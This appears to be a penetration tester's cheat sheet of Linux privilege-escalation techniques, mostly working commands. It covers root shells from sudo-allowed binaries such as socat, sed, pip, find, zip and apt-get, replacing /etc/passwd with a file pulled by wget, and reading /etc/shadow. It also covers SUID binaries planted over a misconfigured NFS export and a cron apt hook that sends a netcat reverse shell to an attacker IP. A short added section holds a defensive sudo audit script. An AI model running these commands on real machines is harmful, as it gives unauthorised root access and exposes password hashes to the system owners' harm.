Topics: socat, scp, tmux, ed, sed, pip, git, cp, taskset, xxd, cat, find, wget, zip, apt, cron job, automation script, nfs
- 1) Linux For Pentester: socat Privilege Escalation
Check sudo rights: sudo -l
test ALL=(root) NOPASSWD: /usr/bin/socat
Method 1)
Victim: sudo socat TCP4-LISTEN:1234,reuseaddr EXEC:"/bin/sh"
Attacker: socat - TCP4:192.168.1.100:1234
Method 2)
Victim: sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.106:1234
Attacker: socat file:`tty`,raw,echo=0 tcp-listen:1234
Reference: https://www.hackingarticles.in/linux-for-pentester-socat-privilege-escalation/
- 2) Linux for Pentester: scp Privilege Escalation
sudo -l
test ALL=(root) NOPASSWD: /usr/bin/scp
Method 1)
Victim:
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
Method 2)
service ssh status   (the SSH service must be active)
Victim:
sudo scp /etc/passwd komal@192.168.1.11:
sudo scp /etc/shadow komal@192.168.1.11:
Attacker:
head /home/komal/shadow
head /home/komal/passwd
- 3) Linux For Pentester: tmux Privilege Escalation
sudo -l
test ALL=(root) NOPASSWD: /usr/bin/tmux
Victim:
sudo tmux
(opens a new terminal with a root shell)
Reference: https://www.hackingarticles.in/category/privilege-escalation/page/3/
- 4) Linux for Pentester: ed Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/
sudo -l
test ALL=(root) NOPASSWD: /bin/ed
Victim: sudo ed
- 5) Linux for Pentester: sed Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-sed-privilege-escalation/
sudo -l
test ALL=(root) NOPASSWD: /usr/bin/sed
Victim:
sudo sed -n '1e exec sh 1>&0' /etc/passwd
- 6) Linux for Pentester: pip Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-pip-privilege-escalation/
sudo -l
test ALL=(root) NOPASSWD: /usr/bin/pip
Victim:
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
- 7) Linux for Pentester: git Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-git-privilege-escalation/
sudo -l
test ALL=(root) NOPASSWD: /usr/bin/git
Victim:
sudo git help config
- 8) Linux for Pentester: cp Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-cp-privilege-escalation/
Check SUID permissions:
find / -perm -u=s -type f 2>/dev/null
Attacker:
openssl passwd -1 -salt ignite pass123
(create a passwd file on the local machine containing an entry for user ignite with the hash above)
python -m SimpleHTTPServer
Victim:
cd /tmp
wget http://192.168.0.16:8000/passwd
cp passwd /etc/passwd
tail /etc/passwd
su ignite
password: pass123
id
- 9) Linux for Pentester: taskset Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-taskset-privilege-escalation/
sudo -l
find / -perm -u=s -type f 2>/dev/null
openssl passwd -1 -salt mark pass123
Victim:
taskset 1 echo 'mark:$1$mark$PL9HIgTDwnE9sG27q2Nrb/:0:0:root/:root:/bin/bash' >>/etc/passwd
su mark
id
- 10) Linux for Pentester: xxd Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-xxd-privilege-escalation/
SUID: find / -perm -u=s -type f 2>/dev/null
Victim: xxd "/etc/shadow" | xxd -r
- 11) Linux for Pentester: cat Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-cat-privilege-escalation/
Victim:
sudo -l
sudo cat /etc/shadow
- 12) Linux for Pentester: find Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-find-privilege-escalation/
Readable files: find /etc/ -readable -type f 2>/dev/null
sudo -l
test ALL=(root) NOPASSWD: /usr/bin/find
Victim:
sudo find /home -exec /bin/bash \;
find /home -exec /bin/bash \;
- 13) Linux for Pentester: wget Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/
Victim:
find / -perm -u=s -type f 2>/dev/null
Attacker: openssl passwd -1 -salt ignite pass123   (create a passwd file on the local machine with this hash)
Victim:
cd /etc
wget -O passwd http://192.168.1.108:8000/passwd
su ignite
password: pass123
id
- 14) Linux for Pentester: zip Privilege Escalation
Reference: https://www.hackingarticles.in/category/privilege-escalation/page/6/
sudo -l
sudo zip 1.zip raj.txt -T --unzip-command="sh -c /bin/bash"
- 15) Linux for Pentester: APT Privilege Escalation
Reference: https://www.hackingarticles.in/category/privilege-escalation/page/6/
sudo -l
test ALL=(ALL) NOPASSWD: /usr/bin/apt-get
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash
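Defender-side check, added here and not taken from the referenced articles: a POSIX sh audit that parses `sudo -l` output and flags rules whose target is one of the binaries from items 1 to 15, so a sudoers review catches them before an attacker's `sudo -l` does. The sample output, host name and rules are constructed.

```shell
#!/bin/sh
# Added audit helper, not from the referenced articles: reads `sudo -l`
# output and flags rules whose target is one of the binaries in these notes,
# because each of them can hand out a root shell when allowed via sudo.

# Constructed sample of `sudo -l` output (host name and rules are made up).
SAMPLE_SUDO_L='Matching Defaults entries for test on victim:
    env_reset, mail_badpass

User test may run the following commands on victim:
    (root) NOPASSWD: /usr/bin/socat
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /bin/systemctl status ssh
    (root) /usr/bin/apt-get'

# Binaries from items 1 to 15 above.
SHELL_CAPABLE='socat scp tmux ed sed pip git cat find wget zip apt-get'

# strip leading whitespace (pure POSIX parameter expansion, no fork)
trim_leading() { printf '%s' "${1#"${1%%[![:space:]]*}"}"; }

# audit_sudo_rules: read `sudo -l` text on stdin, print one RISK line per
# rule whose command is in SHELL_CAPABLE. Exit status 1 if anything was flagged.
audit_sudo_rules() {
  found=0
  while IFS= read -r line; do
    rule=$(trim_leading "$line")
    case "$rule" in \(*\)*) ;; *) continue ;; esac   # only "(runas) ..." rule lines
    rest=${rule#*\)}                                  # drop the "(root)" part
    nopass=no
    case "$rest" in *NOPASSWD:*) nopass=yes; rest=${rest#*NOPASSWD:} ;; esac
    rest=$(trim_leading "$rest")
    cmd=${rest%%[[:space:]]*}                         # first token: command path
    base=${cmd##*/}
    for b in $SHELL_CAPABLE; do
      if [ "$b" = "$base" ]; then
        printf 'RISK nopasswd=%s %s (%s can spawn a shell as root)\n' "$nopass" "$cmd" "$base"
        found=1
        break
      fi
    done
  done
  return "$found"
}

# Stand-alone demo on the sample; on a real host: sudo -l | audit_sudo_rules
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_rules || echo "review the flagged rules"
```

Rules that require a password are still reported (nopasswd=no), since the binary itself is the problem, not only the missing prompt.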
- 16) Exploiting Cron job
Cron entry: */2 * * * * root apt-get update
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 1234 >/tmp/f"};' > pwn
- 17) Linux Privilege Escalation via Automated Script
Reference: https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
Table of Contents
  - Introduction
  - Vectors of Privilege Escalation
  - LinEnum
  - Linuxprivchecker
  - Linux Exploit Suggester 2
  - Bashark
  - BeRoot
Vectors of Privilege Escalation:
  - OS detail and kernel version
  - Any vulnerable package installed or running
  - Files and folders with full control or modify access
  - Files with SUID permissions
  - Mapped drives (NFS)
  - Potentially interesting files
  - Environment variable PATH
  - Network information (interfaces, arp, netstat)
  - Running processes
  - Cron jobs
  - User's sudo rights
  - Wildcard injection
- Linux Privilege Escalation using Misconfigured NFS
Reference: https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
Attacker:
nmap -sV --script=nfs-showmount 192.168.1.102
apt-get install nfs-common
showmount -e 192.168.1.102
Exploiting NFS server for Privilege Escalation
mkdir /tmp/raj
mount -t nfs 192.168.1.102:/home /tmp/raj
cp /bin/bash .
chmod +s bash
ls -la bash
Victim: the SUID copy of bash now sits in the exported /home directory.
- C Program (via the same NFS mount)
Attacker:
cp asroot.c /tmp/raj
cd /tmp/raj
gcc asroot.c -o shell
chmod +s shell
Victim:
cd /home
ls
./shell
id
whoami